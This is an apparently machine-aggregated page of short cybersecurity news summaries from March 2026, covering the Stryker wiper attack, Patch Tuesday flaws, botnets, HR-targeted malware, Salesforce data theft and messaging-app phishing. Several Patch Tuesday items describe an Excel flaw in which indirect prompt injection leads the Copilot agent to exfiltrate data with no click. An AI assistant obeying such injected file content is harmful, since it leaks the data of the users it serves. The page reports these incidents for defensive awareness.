Information Security News | AI Aggregator

Stryker, a major U.S. medical technology company, is experiencing a global system outage due to a suspected cyberattack, potentially linked to the Iranian hacktivist group "Handala." The attack appears to be a destructive wiper-style incident, affecting devices running Microsoft Windows. Experts warn that such disruptions can severely impact healthcare supply chains. Organizations are advised to enhance network visibility, segment operational systems, and prevent data exfiltration to mitigate risks.

Iranian hacktivist group Handala claims responsibility for a wiper attack on Stryker, a Michigan-based medical technology firm, resulting in the shutdown of operations in 79 countries and the erasure of data from over 200,000 systems. The attack, described as retaliation for a U.S. missile strike in Iran, has led to communication disruptions among employees, with devices reportedly wiped via Microsoft Intune. Handala is linked to Iran's Ministry of Intelligence and Security and has targeted various entities, primarily in Israel.

A pro-Iran hacktivist group, Handala, claims to have breached Stryker, a U.S. medical tech company, disrupting operations globally. They reported wiping over 200,000 systems and extracting 50 terabytes of data. Stryker confirmed severe disruptions affecting access to systems and services. Handala's actions are framed as retaliation for U.S. military actions in Iran. The group has previously targeted Israeli infrastructure and employs various cyberattack methods, including wiper malware and data theft.

Medical device manufacturer Stryker confirmed a cyberattack that disrupted operations, affecting its Microsoft environment. Employees reported that corporate devices were wiped, and access to email and work platforms was lost. The hacking group Handala claimed responsibility, alleging they wiped over 200,000 systems and stole 50 terabytes of data, citing a motive related to U.S. military actions in Iran. Stryker is implementing business continuity measures but has not commented on Handala's involvement.

Stryker, a U.S. medical equipment company, reported a cyberattack that disrupted its global networks. The incident, which affected its Microsoft programs, is believed to be contained, with no indications of ransomware or malware. The hacking group Handala, linked to Iran, was noted to have appeared on company login pages. Stryker is based in Portage, Michigan, employs 56,000 people, and had over $25 billion in revenue in 2025.

Pro-Palestinian hacktivist group Handala claims responsibility for a cyberattack on Stryker, alleging the wiping of over 200,000 systems and a global operational disruption. The attack, which occurred on March 11, 2026, resulted in the exfiltration of approximately 50TB of corporate data and forced Stryker to shut down offices in 79 countries. The company is collaborating with Microsoft to address the incident, which has led to a 3.2% drop in its stock value.

A hacking group linked to Iran claimed responsibility for a cyberattack on US med-tech firm Stryker, causing a global network disruption. Stryker confirmed the incident but noted no ransomware or malware was involved. The group, Handala, alleged they wiped over 200,000 systems and stole 50 TB of data, citing retaliation for US airstrikes. They also claimed to have breached Verifone, which denied any intrusion. This incident highlights the escalating threat to critical healthcare infrastructure.

On March 11, 2026, Stryker Corporation reported a cybersecurity incident disrupting its Microsoft environment. The company activated its cybersecurity response plan and is investigating the incident with external experts. There is no indication of ransomware or malware, and the incident is believed to be contained. Disruptions to information systems and business applications are ongoing, with an unknown timeline for full restoration. The investigation continues, and the potential operational and financial impacts are still being assessed.

Stryker is facing a global network disruption due to a cyberattack, which reportedly involved hackers remotely wiping devices running Microsoft’s Windows OS. The company, based in Portage, Michigan, stated the incident was contained and did not involve ransomware. An Iran-linked group called Handala claimed responsibility, marking a significant escalation in their activities. Stryker has advised employees to disconnect from networks and is implementing business continuity measures to support customers.

On March 11, the Iran-linked Handala Hack Team claimed cyberattacks on Stryker Corporation and Verifone. Stryker confirmed a cyber incident affecting its Microsoft-based network, causing internal disruptions, but reported no ransomware or malware. Handala claimed to have wiped over 200,000 systems and extracted 50 terabytes of data, which Stryker has not verified. Verifone denied any breach or service disruption, despite Handala releasing screenshots suggesting access to its systems.

Pro-Iranian hackers, the Handala group, claimed responsibility for a cyber-attack on medical tech firm Stryker, disrupting operations globally. They asserted to have wiped over 200,000 systems and exfiltrated 50TB of data. Stryker confirmed the incident, noting it caused significant disruptions to its Microsoft environment but indicated no ransomware or malware was involved. Experts suggest the attack may have exploited Microsoft Intune for mass device wiping, highlighting the risks of geopolitical conflicts impacting critical sectors like healthcare.

An Iran-linked hacking group has attacked U.S. medical device company Stryker, causing global disruptions to its Microsoft systems. The attack, which began in the U.S. and affected thousands of employees in Ireland, resulted in the wiping of devices and extraction of 50 terabytes of data. Stryker stated there is no indication of malware or ransomware, and the situation is contained to its internal environment. The attack is viewed as retaliation for recent U.S. actions against Iran.

Google has acquired Israeli cybersecurity firm Wiz for $32 billion, marking its largest acquisition to date. Wiz specializes in cloud security, helping organizations prevent and respond to cybersecurity threats. The acquisition aims to enhance Google Cloud's security offerings while allowing Wiz to maintain its brand and commitment to securing customers across various cloud environments. Initial discussions began in 2024 with a lower offer, but negotiations resumed in 2025, leading to the final agreement.

Google has completed a $32 billion acquisition of Wiz, a cloud and AI security platform, enhancing its cybersecurity offerings for government and enterprise customers in multicloud environments. Wiz will maintain its brand while integrating with Google Cloud, providing a comprehensive security platform. This acquisition aims to improve threat prevention, detection, and response, while reducing security maintenance costs. Wiz's expertise will support secure AI application development amid rising risks.

Google has completed its $32 billion acquisition of Wiz, a cloud and AI security platform, marking the largest deal in its history. Wiz, which crossed $1 billion in annual recurring revenue in 2025, will join Google Cloud while retaining its brand. The acquisition aims to enhance cloud security amid rising AI-related threats. The combined platform will offer unified security, AI-driven threat intelligence, and multicloud support, maintaining services for competitors to build enterprise trust.

Meta removed 159 million scam ads in 2025 and disabled 10.9 million accounts linked to criminal scam centers amid scrutiny from U.S. lawmakers. Americans lost over $10 billion to scams in 2023. Meta is collaborating with law enforcement, including the FBI and Thai police, to disrupt scam networks and has introduced new detection tools. Despite claims of significant ad revenue from scams, Meta asserts that scams undermine trust in its advertising ecosystem. The company aims for 90% of ad revenue to come from verified advertisers by 2026.

Meta has introduced advanced AI tools on Facebook, Messenger, and WhatsApp to combat scams by analyzing text, images, and context to identify scam patterns. The systems detect impersonation and deceptive links, alerting users to suspicious friend requests and potential scams. WhatsApp warns users about risky linking requests, while Messenger offers scam detection and recommended actions. Meta collaborates with law enforcement, having disabled over 150,000 scam-related accounts and contributed to 21 arrests. Awareness campaigns are also underway.

Meta disabled over 150,000 accounts linked to Southeast Asian scam centers, collaborating with authorities from multiple countries, resulting in 21 arrests by the Royal Thai Police. This follows a December 2025 initiative that removed 59,000 accounts. New tools include warnings for suspicious accounts on Facebook, alerts for WhatsApp linking requests, and advanced scam detection on Messenger. The U.K. government is launching an Online Crime Centre to combat cybercrime, utilizing AI to identify and disrupt scams.

Meta is implementing new tools across Facebook, WhatsApp, and Messenger to warn users about online scams. The company acknowledges that while they actively find and remove malicious accounts, scammers often evade detection. The new alerts aim to notify users before they engage with potentially suspicious content.

Meta disabled over 150,000 accounts in a crackdown on Southeast Asian scam networks, with 21 arrests made by Thai police. The operation, supported by the FBI and other international agencies, targeted sophisticated online scams, including fake romantic relationships and cryptocurrency fraud. Meta introduced new protective tools, such as alerts for suspicious friend requests on Facebook and a WhatsApp warning system for fraudulent device-linking attempts. The crackdown reflects enhanced international cooperation against cybercrime.

Meta has introduced anti-scam tools across WhatsApp, Facebook, and Messenger, including device linking warnings and alerts for suspicious friend requests. In collaboration with law enforcement, 21 alleged fraudsters were arrested, and over 150,000 scam-related accounts were disabled. New features include alerts for suspicious friend requests and advanced scam detection in Messenger. Meta's efforts aim to disrupt fraud, with partnerships involving the FBI and international agencies to combat scam centers targeting users globally.

Meta is launching AI tools to combat scams on WhatsApp, Facebook, and Messenger, addressing issues like fake profiles and phishing. In 2025, Meta removed over 159 million scam ads and deleted nearly 7 million scam accounts on WhatsApp. New features include pop-up warnings for suspicious account interactions and AI scans to identify scam content. However, concerns about privacy and data processing remain, with no specific rollout date provided for these tools.

Meta has introduced enhanced anti-scam tools across WhatsApp, Facebook, and Messenger to combat sophisticated fraud tactics, including celebrity impersonation and brand spoofing. New AI-powered features will flag suspicious friend requests and detect patterns in scam messages. Meta's ongoing anti-scam campaign has led to the removal of millions of scam ads and accounts. Despite these efforts, scrutiny from regulators continues, particularly regarding the company's handling of scam advertisements and revenue implications.

Microsoft's latest Patch Tuesday addressed 83 vulnerabilities, marking the first update in six months without any actively exploited zero-days. Notably, six vulnerabilities, including CVE-2026-23668 and CVE-2026-24291, are deemed more likely to be exploited. CVE-2026-26144 in Excel could allow data exfiltration via the Copilot Agent. Additionally, CVE-2026-26110 and CVE-2026-26113 in Office pose risks for remote code execution, potentially enabling attackers to control systems and deploy ransomware.

A critical-severity information disclosure vulnerability, CVE-2026-26144, has been identified in Microsoft Excel, allowing zero-click attacks via the Copilot Agent to exfiltrate data. This flaw requires network access but no user interaction. It poses significant risks in corporate environments due to potential silent data extraction. Recommendations include patching promptly, restricting outbound network traffic, and monitoring unusual requests. Additionally, two other publicly known vulnerabilities, CVE-2026-26127 and CVE-2026-21262, are noted but not actively exploited.

On March 10, 2026, Microsoft released Patch Tuesday updates addressing 84 vulnerabilities across various products, including Windows, Office, and SQL Server. Eight flaws are rated Critical. Notable vulnerabilities include CVE-2026-26127 (CVSS 7.5), allowing denial of service in .NET apps, and CVE-2026-21262 (CVSS 8.8), enabling privilege escalation in SQL Server. The most severe flaw, CVE-2026-21536 (CVSS 9.8), allows remote code execution on Microsoft Devices Pricing Program services. None of the flaws are currently exploited.

On March Patch Tuesday, three high-severity vulnerabilities were identified in Microsoft Office. Notably, CVE-2026-23665 affects Azure Linux virtual machines, allowing unauthorized local privilege escalation (CVSS 8.1). Azure users must update the aadsshlogin package via their package manager. Additionally, CVE-2026-21262 in SQL Server (CVSS 8.8) could grant SQL sysadmin privileges, impacting versions 2016 and later. IT teams should maintain asset inventories for effective patch management in cloud environments.

Microsoft's March 2026 Patch Tuesday addressed 77 vulnerabilities, including critical remote code execution flaws in Microsoft Office (CVE-2026-26113, CVE-2026-26110) and privilege escalation bugs (CVE-2026-24291, CVE-2026-24294). Notably, CVE-2026-21536, a critical bug discovered by an AI agent, highlights AI's role in vulnerability detection. Microsoft also issued an emergency update for Windows Server 2022 and Adobe fixed 80 vulnerabilities across its products.

Microsoft disclosed a critical zero-day vulnerability in SQL Server (CVE-2026-21262) on March 10, 2026, allowing authenticated attackers to escalate privileges to sysadmin level. The flaw, due to improper access control, has a CVSS score of 8.8 and affects SQL Server 2016 to 2025. Microsoft released security updates and recommends immediate patching, auditing user permissions, and monitoring for unusual activity. Exploitation is assessed as "Less Likely," but public disclosure increases risk.

An emergency security update has been released for a .NET Framework vulnerability (CVE-2026-26127) that allows unauthenticated remote attackers to trigger Denial-of-Service (DoS) conditions. With a CVSS score of 7.5, it affects .NET 9.0 and 10.0 on Windows, macOS, and Linux. Microsoft advises upgrading to .NET 9.0.14 and 10.0.4 and patching Microsoft.Bcl.Memory packages. Monitoring system logs for unusual activity is also recommended. No active exploitation has been reported.

Microsoft's March Patch Tuesday addressed 84 vulnerabilities, including two public zero-days: CVE-2026-26127 (7.5, denial-of-service in .NET) and CVE-2026-21262 (8.8, elevation of privilege in SQL Server). Notably, CVE-2026-21536 (9.8, remote code execution in Microsoft Devices Pricing Program) was fully mitigated. Key vulnerabilities include CVE-2026-25187 (7.8, Winlogon privilege escalation) and CVE-2026-26118 (8.8, server-side request forgery in Azure). Microsoft is also enhancing Windows Autopatch for faster security updates.

Microsoft's March Patch Tuesday addressed 79 vulnerabilities, including two zero-days: CVE-2026-21262, an SQL Server elevation of privilege (EoP) bug with a CVSS score of 8.8, and CVE-2026-26127, a denial-of-service flaw in .NET. The SQL Server vulnerability is concerning due to potential exposure, while the .NET flaw could allow attackers to exploit downtime for malicious activities. Overall, the majority of vulnerabilities this month are EoP-related, with three rated critical.

Microsoft's March 2026 Patch Tuesday addresses 79 vulnerabilities, including three critical and two publicly disclosed zero-days. Key issues involve an out-of-bounds read in SQL Server allowing privilege escalation (CVSS 8.8) and a denial-of-service vulnerability in .NET. Critical vulnerabilities include a remote code execution flaw (CVSS 9.8) affecting the Devices Pricing Program. Organizations are advised to prioritize patch deployment for internet-facing services and systems handling sensitive data to mitigate risks.

On March 2026 Patch Tuesday, Microsoft addressed over 80 vulnerabilities, including two publicly disclosed flaws: CVE-2026-21262 in SQL Server and CVE-2026-26127 in .NET. Six vulnerabilities are flagged as “more likely” to be exploited, including CVE-2026-24289 and CVE-2026-26132 (Windows Kernel flaws) and CVE-2026-24294 (Windows SMB Server). CVE-2026-26123 affects Microsoft Authenticator, potentially exploitable via a rogue app. Rapid deployment of patches is recommended to maintain security.

Microsoft's March 2026 Patch Tuesday addresses 79 CVEs, including two zero-day vulnerabilities. CVE-2026-21262 (CVSS 8.8) in SQL Server allows privilege escalation to sysadmin without user interaction, posing significant data risks. CVE-2026-26127 (CVSS 7.5) in .NET can cause denial of service by crashing applications. Additionally, two remote code execution flaws in Office (CVE-2026-26110, CVE-2026-26113) and an information disclosure flaw (CVE-2026-26144) were noted. Users are advised to apply updates promptly.

Microsoft's March 2026 Patch Tuesday fixed 83 vulnerabilities, including a high-severity Excel flaw (CVE-2026-26144) rated 7.5/10. This vulnerability combines cross-site scripting and indirect prompt injection, enabling zero-click data theft via the Copilot AI assistant. Attackers can exfiltrate sensitive data without opening the file, merely by viewing it in the preview pane. Users are urged to apply the update, restrict outbound traffic, and consider disabling Copilot as mitigations.

On March 10, 2026, Microsoft addressed a critical vulnerability (CVE-2026-26110) in its Office suite, allowing remote code execution via local exploitation. The flaw, rated 8.4 on the CVSS scale, affects multiple Office applications across various platforms. Attackers can exploit this "Type Confusion" vulnerability without elevated privileges or user interaction, notably through the Windows Preview Pane. Microsoft advises immediate patching and suggests disabling the Preview Pane as a temporary measure.

A vulnerability (CVE-2026-26123) in Microsoft Authenticator for iOS and Android could expose one-time sign-in codes to malicious apps on the same device. If exploited, attackers could access compromised accounts and services. Users are advised to update the app immediately via the App Store or Google Play Store. If unable to update, avoid installing new apps that handle authentication links and verify handlers when scanning QR codes. Consider alternative MFA options and use anti-malware protection.

KadNap malware has compromised over 14,000 devices, primarily ASUS routers, creating a stealth proxy botnet for routing malicious traffic. First detected in August 2025, it heavily targets the U.S. and utilizes a custom Kademlia-based peer-to-peer system to obscure its command infrastructure. Infected devices can execute additional payloads and maintain persistent communication with command-and-control servers. The botnet poses significant risks for organizations and individuals due to its evasion tactics and persistent nature.

A new malware strain named KadNap has infected over 14,000 Asus routers, creating a botnet for malicious proxy traffic. Detected by Black Lotus, the botnet uses a custom Kademlia DHT protocol for resilience, allowing it to evade traditional monitoring. The majority of infected devices (60%) are in the US, with others in Taiwan, Hong Kong, and several European countries. KadNap supports a proxy network called Doppelgänger, which has already been deployed in the wild.

Researchers have identified a botnet named KadNap, infecting approximately 14,000 routers, primarily Asus models, exploiting unpatched vulnerabilities. The botnet, which has grown from 10,000 infections since last August, is mostly located in the US, with smaller numbers in Taiwan, Hong Kong, and Russia. Its peer-to-peer design using distributed hash tables enhances resistance to detection and takedowns, complicating efforts for defenders. The malware does not appear to utilize zero-day exploits.

A year-long malware campaign targeting HR departments and recruiters has been uncovered, utilizing a resume-themed ISO file to initiate infections. The malware employs techniques to evade detection, including disabling antivirus software and checking for virtual environments. Key components include a malicious DWrite.dll and a new EDR killer named BlackSanta, which disrupts security processes. The ultimate payload remains unidentified due to an unavailable C2 server, but it likely involves information-stealing modules.

Russian hackers are targeting HR departments globally with a new malware called BlackSanta, utilizing phishing emails that link to malicious ISO files. The infection chain involves downloading a PowerShell script that retrieves a DLL file, which disables endpoint detection and response (EDR) tools, allowing further payloads to be deployed. The attackers' identity remains unclear, and while they have been observed in the wild, the number of affected organizations has not been disclosed.

A report by Aryaka on 11 March 2026 reveals the BlackSanta malware campaign targeting HR staff. This Russian-speaking group exploits recruitment workflows by sending emails with links to CVs, leading to the download of malicious ISO files. Utilizing steganography, the malware hides code in images and remains dormant in secure environments. Its BlackSanta module employs BYOVD to exploit vulnerabilities, gaining kernel access to disable security tools and search for sensitive data.

A new malware campaign, identified by Aryaka Threat Research Lab, targets HR teams by distributing malicious files disguised as job applications. The BlackSanta tool disables endpoint detection and response (EDR) systems post-compromise. Attackers use phishing emails to initiate a multi-stage infection, gathering system information while evading detection. The campaign exploits recruitment workflows, posing a significant risk to organizations. Enhanced monitoring and stronger endpoint protection are recommended to mitigate such threats.

Threat actors are targeting HR departments with phishing emails containing malicious resumés that include ISO file attachments. Researchers at Aryaka report that when the ISO is mounted, it executes a malicious shortcut that runs obfuscated PowerShell commands to extract hidden payloads from a steganographic image. This process sideloads a malicious DLL using a legitimate application, enabling the attacker to harvest data from the infected system.

Crooks have compromised legitimate WordPress sites, including a US Senate candidate's campaign page, to distribute infostealers via fake Cloudflare CAPTCHA prompts. Researchers at Rapid7 found that these prompts trick users into executing commands that download credential-stealing malware. The campaign, active since at least December 2025, has affected over 250 websites across 12 countries. The attackers leverage the reputation of compromised sites to evade suspicion, indicating a high level of automation in their operations.

A global cyber-criminal campaign has compromised over 250 legitimate WordPress sites to deliver infostealer malware, impacting users in at least 12 countries. The attackers exploit user trust by presenting a fake Cloudflare Captcha to initiate malware installation. Payloads include Vidar Stealer and Vodka Stealer, aimed at stealing sensitive data. Rapid7 suggests vulnerabilities in plugins or brute-force attacks may be the compromise method. Recommendations include regular software reviews, strong passwords, and two-factor authentication.

Hackers are exploiting vulnerable WordPress sites to distribute malware through a fake Cloudflare CAPTCHA, as reported by Rapid7. This ongoing campaign, which began in December 2025, has compromised over 250 sites, including a US Senate candidate's page. Attackers gain access via weak credentials or unpatched plugins, then prompt users to run a command that downloads an infostealer, targeting sensitive data like login credentials and cryptocurrency information. The campaign demonstrates high automation and broad targeting.

A voice-phishing scam targeting a third-party vendor of Ericsson exposed personal data of over 15,000 individuals. The breach occurred between April 17-22, 2025, and was discovered on April 28. Data potentially compromised includes names, Social Security numbers, addresses, and financial information. Ericsson was notified on November 10, 2025, and confirmed 15,661 individuals were affected by February 23, 2026. Affected individuals are offered 12 months of credit monitoring. The vendor has since implemented new safeguards.

Ericsson US confirmed a third-party data breach affecting over 4,000 customers, exposing sensitive data including names, addresses, SSNs, financial information, and medical details. The breach was detected on April 28, 2025, prompting an investigation and notification to the FBI. To mitigate impact, Ericsson is offering free identity theft protection services for 12 months through IDX. No evidence of misuse has been reported, and no threat actors have claimed responsibility.

A data breach at Ericsson Inc. has exposed personal information of 15,661 employees and customers due to unauthorized access via a third-party service provider. Detected on April 28, 2025, the breach occurred between April 17 and April 22, 2025. Affected data includes names, Social Security Numbers, financial information, and medical details. Ericsson is offering complimentary identity protection services through IDX and has not identified evidence of misuse of the data.

U.S. CISA has added three vulnerabilities to its Known Exploited Vulnerabilities catalog: CVE-2021-22054 (Omnissa Workspace ONE, CVSS 7.5), CVE-2025-26399 (SolarWinds Web Help Desk, CVSS 9.8), and CVE-2026-1603 (Ivanti EPM, CVSS 8.6). Federal agencies must remediate CVE-2026-1603 and CVE-2021-22054 by March 23, 2026, and CVE-2025-26399 by March 12, 2026. Organizations are advised to review and address these vulnerabilities to protect their networks.

CISA added CVE-2026-1603, an authentication bypass vulnerability in Ivanti Endpoint Manager, to its KEV catalog on March 9, 2026. This flaw affects all versions prior to 2024 SU5, allowing remote, unauthenticated attackers to access sensitive credential data. Exploitation can lead to credential leaks and privilege escalation. Affected organizations must patch by March 23, 2026. CISA recommends blocking access to management ports and monitoring logs for unusual activity until the patch is applied.

CISA has issued a warning regarding an actively exploited authentication bypass vulnerability in Ivanti Endpoint Manager (EPM), tracked as CVE-2026-1603, affecting versions prior to 2024 SU5. This flaw allows remote, unauthenticated attackers to leak stored credentials. It was patched on February 9, alongside CVE-2026-1602. Additionally, CISA updated its directive on two Cisco Catalyst SD-WAN vulnerabilities that were also fixed last month after being exploited in zero-day attacks.

Sednit, also known as APT28, has reactivated its advanced implant team since April 2024, deploying two main tools: BeardShell and Covenant, targeting Ukrainian military personnel. SlimAgent, a keylogger derived from the older Xagent, was first identified in a Ukrainian governmental machine. BeardShell executes PowerShell commands via Icedrive as its C&C channel, while Covenant, modified for long-term espionage, utilizes various cloud providers for communication. Sednit's operations indicate a return to sophisticated malware development.

The Russian hacking group APT28 has been using two malware implants, BEARDSHELL and COVENANT, for long-term surveillance of Ukrainian military personnel since April 2024. BEARDSHELL executes PowerShell commands and utilizes Icedrive for command-and-control. COVENANT, a modified .NET post-exploitation framework, employs a new cloud-based protocol for C2. Additionally, APT28's SLIMAGENT malware logs keystrokes and captures screenshots, showing connections to earlier malware like XAgent.

APT28 has been conducting long-term espionage on Ukrainian military personnel using custom malware, specifically BEARDSHELL and COVENANT, since April 2024. The group, linked to the Russian GRU, employs these tools for persistent access and data collection. BEARDSHELL utilizes ChaCha20-Poly1305 encryption and the Icedrive API, while SLIMAGENT captures screenshots and encrypts them with AES and RSA. The malware shows strong code similarities to earlier APT28 tools, indicating ongoing development and adaptation for espionage operations.

Salesforce reported increased threat actor activity exploiting misconfigurations in Experience Cloud sites using a modified AuraInspector tool. This custom tool extracts data by leveraging overly permissive guest user settings. Salesforce emphasized that no inherent platform vulnerabilities exist, but misconfigurations can lead to unauthorized data access. Recommendations include reviewing guest user settings, setting Default External Access to Private, and monitoring logs for unusual activity. The campaign may be linked to the ShinyHunters group.

Salesforce has alerted Experience Cloud customers to audit their website configurations following a campaign by the ShinyHunters threat group, which has reportedly stolen data from hundreds of companies. The group exploits misconfigured guest user settings to access sensitive data. Salesforce recommends auditing permissions, enforcing least privilege access, setting default external access to private, and reviewing logs for unusual access patterns. ShinyHunters claims to have compromised around 400 websites and 100 high-profile companies.

Infamous ransomware group ShinyHunters claims responsibility for a data theft campaign targeting Salesforce Aura, affecting around 100 high-profile organizations, including Snowflake, Okta, LastPass, and Sony. The attackers exploited misconfigured guest user permissions on Salesforce Experience Cloud instances, using a modified AuraInspector tool to identify vulnerabilities. Stolen data, including names and phone numbers, is reportedly being used for social engineering and voice phishing. Salesforce confirmed the issue is due to misconfigurations, not inherent vulnerabilities.

Threat actors are using a modified AuraInspector tool to exploit misconfigurations in Salesforce Experience Cloud sites, allowing access to sensitive data. Salesforce warns that attackers are scanning public sites to find overly permissive guest user settings. The custom tool not only identifies vulnerabilities but also extracts data. Organizations are advised to review and secure their guest user settings to mitigate risks. The campaign is linked to the ShinyHunters group, known for targeting Salesforce environments.

ShinyHunters has threatened around 400 organizations with data leaks unless their extortion demands are met, claiming to have accessed sensitive Salesforce Experience Cloud data. The hackers exploited overly permissive guest user settings, using a modified Aura Inspector tool. Salesforce asserts the issue stems from customer configurations, not platform flaws. Companies are advised to adopt a "least privilege" approach, restrict guest access, and disable public APIs to enhance security.

Salesforce has alerted customers to review their Experience Cloud 'guest' configurations due to a data theft campaign by the cybercrime group ShinyHunters. The group claims to have breached hundreds of organizations, including around 400 websites and 100 high-profile companies, by exploiting overly permissive guest user settings. Salesforce's Cyber Security Operations Center is monitoring the situation, noting that attackers are using a modified version of the open-source tool Aura Inspector for mass scanning of affected sites.

Salesforce issued a security alert regarding a series of attacks targeting its customers, attributed to the ShinyHunters threat group, which claims around 100 companies have been affected. The attacks exploit overly permissive guest user configurations on public-facing Experience Cloud sites. Salesforce emphasized that the issue is not due to a platform vulnerability and advised customers to restrict guest user settings. The threat actor is using a modified tool, AuraInspector, to scan for vulnerable instances.

Salesforce confirmed a new attack campaign by the ShinyHunters group targeting its Experience Cloud sites. Attackers are using a modified Aura Inspector tool to scan public sites and exploit excessive guest user permissions to access Salesforce CRM data. Salesforce recommends enforcing a "Least Privilege" access model, disabling public APIs, and reviewing guest user permissions. The group claims to have compromised around 100 companies, with stolen data typically including names and phone numbers for social engineering attacks.

OpenAI is acquiring Promptfoo, an AI security platform that assists enterprises in identifying and remediating vulnerabilities in AI systems during development. The integration will enhance OpenAI Frontier, focusing on security, compliance, and systematic testing of AI agents. Promptfoo's tools are trusted by over 25% of Fortune 500 companies, and the acquisition aims to bolster secure AI application deployment. OpenAI plans to continue the open-source project while enhancing enterprise capabilities within Frontier.

OpenAI plans to acquire Promptfoo to enhance security testing for AI agents as enterprises adopt autonomous systems. Promptfoo’s tools enable developers to test large language model applications against adversarial prompts, including prompt injection and jailbreak attempts, ensuring compliance with safety and reliability guidelines. OpenAI intends to integrate Promptfoo’s technology into OpenAI Frontier, its platform for developing and managing AI coworkers.

OpenAI is acquiring Promptfoo, an AI security platform, to enhance the security of AI systems against vulnerabilities like prompt injection and jailbreaks. The integration into OpenAI Frontier will provide automated testing, workflow integration, and compliance features to help organizations manage AI-related security risks. Promptfoo's tools, trusted by over 25% of Fortune 500 companies, will enable systematic evaluation of AI agents, addressing critical vulnerabilities before deployment. The acquisition aims to strengthen governance and security in enterprise AI development.

OpenAI has acquired Promptfoo to enhance security testing for its enterprise AI agents. Promptfoo, founded in July 2024, provides open-source tools for evaluating large language models and AI agents, addressing security gaps highlighted by experts. The integration will enable systematic testing, risk detection, and compliance oversight within OpenAI Frontier. The acquisition aims to automate security testing and improve accountability in AI development. Financial details were not disclosed, but Promptfoo's tools are used by over 25% of Fortune 500 companies.

Russia-linked hackers are targeting Signal and WhatsApp accounts of government and military officials globally, according to Dutch intelligence agencies MIVD and AIVD. The campaign aims to compromise accounts by tricking users into revealing verification codes and exploiting the "linked devices" feature. Recommendations include monitoring group chats for signs of compromise, reporting suspicious accounts, and verifying contacts through alternative channels. The advisory also outlines how to identify and respond to attacks.

Russian state hackers are targeting Signal and WhatsApp accounts of diplomats, military staff, and government officials globally, according to Dutch intelligence. Attackers trick users into revealing verification codes and PINs without exploiting technical vulnerabilities. They impersonate Signal support chatbots and misuse linked devices features. Users are advised to be cautious of duplicate identities in group chats, which may indicate account compromise. A cybersecurity advisory has been issued for affected individuals.

Russian government hackers are targeting Signal and WhatsApp users, particularly government officials and journalists, using phishing and social engineering techniques. They impersonate Signal's support team to request verification codes and PINs, allowing them to take over accounts. For WhatsApp, they exploit the "Linked devices" feature to access messages. Victims may not realize they have been compromised. Dutch intelligence warns that these tactics have been observed in the context of the Ukraine conflict.

Signal has confirmed targeted phishing attacks leading to account takeovers of high-profile users, including journalists and government officials. The attacks exploit user trust rather than technical vulnerabilities, with attackers impersonating trusted entities to harvest SMS verification codes and private Signal PINs. Signal warns users against sharing verification details and emphasizes that official support will never request such information. User vigilance and strict operational security practices are critical defenses against these threats.

On March 9, 2026, Dutch intelligence agencies AIVD and MIVD warned that Russian hackers are targeting Signal and WhatsApp accounts by impersonating support chatbots to obtain users' verification codes. This allows hackers to hijack accounts and read private messages. The apps' reputation for privacy makes them attractive targets. Users should watch for suspicious group member lists and unauthorized name changes. Experts emphasize that these apps are not suitable for sensitive communications, as compromised accounts can facilitate further attacks.

A campaign by Russian hackers targeting the encrypted messaging apps Signal and WhatsApp has been revealed by Dutch intelligence, affecting military and government officials. The attacks involve impersonating a 'Signal Support chatbot' to solicit verification codes and exploiting the linked devices feature. Dutch agencies advise against using these apps for sensitive information and provide guidance to identify malicious activities, such as duplicate contacts in group chats.

Dutch intelligence services AIVD and MIVD report a phishing campaign by Russian state-backed hackers targeting Signal and WhatsApp accounts of high-value individuals, including officials and journalists. Attackers impersonate support accounts to trick users into revealing verification codes or linking malicious devices. Recommendations include never sharing verification codes, being cautious with links, regularly reviewing linked devices, using disappearing messages, and enabling multi-factor authentication to enhance security.

Russian state-sponsored hackers are conducting a large-scale cyber-espionage campaign targeting WhatsApp and Signal accounts of dignitaries, military personnel, and civil servants, as reported by the Dutch intelligence agency AIVD. The hackers use social engineering tactics to obtain security verification codes, often by spoofing support chatbots. AIVD warns that sensitive information has likely been accessed, advising against using these platforms for classified communications.

A breach at TriZetto Provider Solutions (TPS) has compromised personal and health insurance information of over 3.4 million patients, as disclosed by the Maine Attorney General on October 2, 2025. Affected data includes names, addresses, Social Security numbers, and health insurance details. TPS has initiated investigations and implemented additional security measures, though specifics are unclear. They are offering credit monitoring services to those impacted. TPS is owned by Cognizant Technology Solutions, which has a history of security incidents.

A data breach at Cognizant’s TriZetto Provider Solutions affected over 3.4 million patients, exposing sensitive health data. Detected on October 2, 2025, the breach began in November 2024, involving unauthorized access to insurance eligibility records. Exposed data includes names, addresses, birth dates, Social Security numbers, and health insurance details, but not financial information. TriZetto is offering 12 months of free identity protection services and encourages vigilance against potential fraud.

TriZetto reported a data breach affecting approximately 3.4 million individuals, with unauthorized access occurring from November 2024 to October 2025. The breach involved sensitive patient and insurance records, including names, birth dates, Social Security numbers, and health insurance details. Payment data remained secure. TriZetto is offering free identity theft monitoring through Kroll and has notified affected individuals and the Maine Attorney General. OCHIN confirmed patient information was compromised.

OpenAI launched Codex Security, an AI-powered tool for identifying and fixing vulnerabilities, now in research preview for ChatGPT Pro, Enterprise, Business, and Edu users. In 30 days, it scanned 1.2 million commits, finding 792 critical and 10,561 high-severity issues in projects like OpenSSH and GnuTLS, including CVEs such as CVE-2026-24881. The tool enhances vulnerability detection by analyzing project context, validating findings, and proposing context-specific fixes, significantly reducing false positives.

OpenAI launched Codex Security, an AI tool designed to identify and help fix software vulnerabilities in codebases. Available in research preview for ChatGPT Pro, Enterprise, Business, and Edu customers, it previously operated in private beta. In the last 30 days, it scanned over 1.2 million commits, identifying 792 critical and 10,561 high-severity findings. The system uses a threat model for context, validates issues in sandboxed environments, and suggests patches to minimize regression risk.

OpenAI's Codex Security has identified over 11,000 high-severity and critical vulnerabilities in real-world codebases within its first month. The tool, designed to automatically detect, validate, and remediate flaws, found approximately 800 critical issues across more than a million commits. Unlike traditional scanners, Codex Security operates like a security researcher, mapping attack paths and proposing fixes, aiming to reduce alert fatigue for AppSec teams by focusing on realistically exploitable vulnerabilities.

OpenAI has launched Codex Security, a new tool for detecting high-impact software vulnerabilities while minimizing false positives and triage workload. This tool, now in research preview and free for one month, improves upon its predecessor, Aardvark, by providing high-confidence findings and actionable fixes. It aims to help security teams focus on significant vulnerabilities, enhancing the speed of secure code deployment. Future pricing details post-free trial remain undisclosed.

President Trump released a cyber strategy emphasizing offensive operations, securing federal networks, and enhancing the cybersecurity workforce. Key pillars include shaping adversary behavior, modernizing federal networks with technologies like post-quantum cryptography, and securing critical infrastructure. An executive order was signed to prioritize cybercrime prosecution and improve agency tools against international criminal organizations. While some praised the strategy's focus on deterrence and AI, critics noted its vagueness and lack of actionable plans.

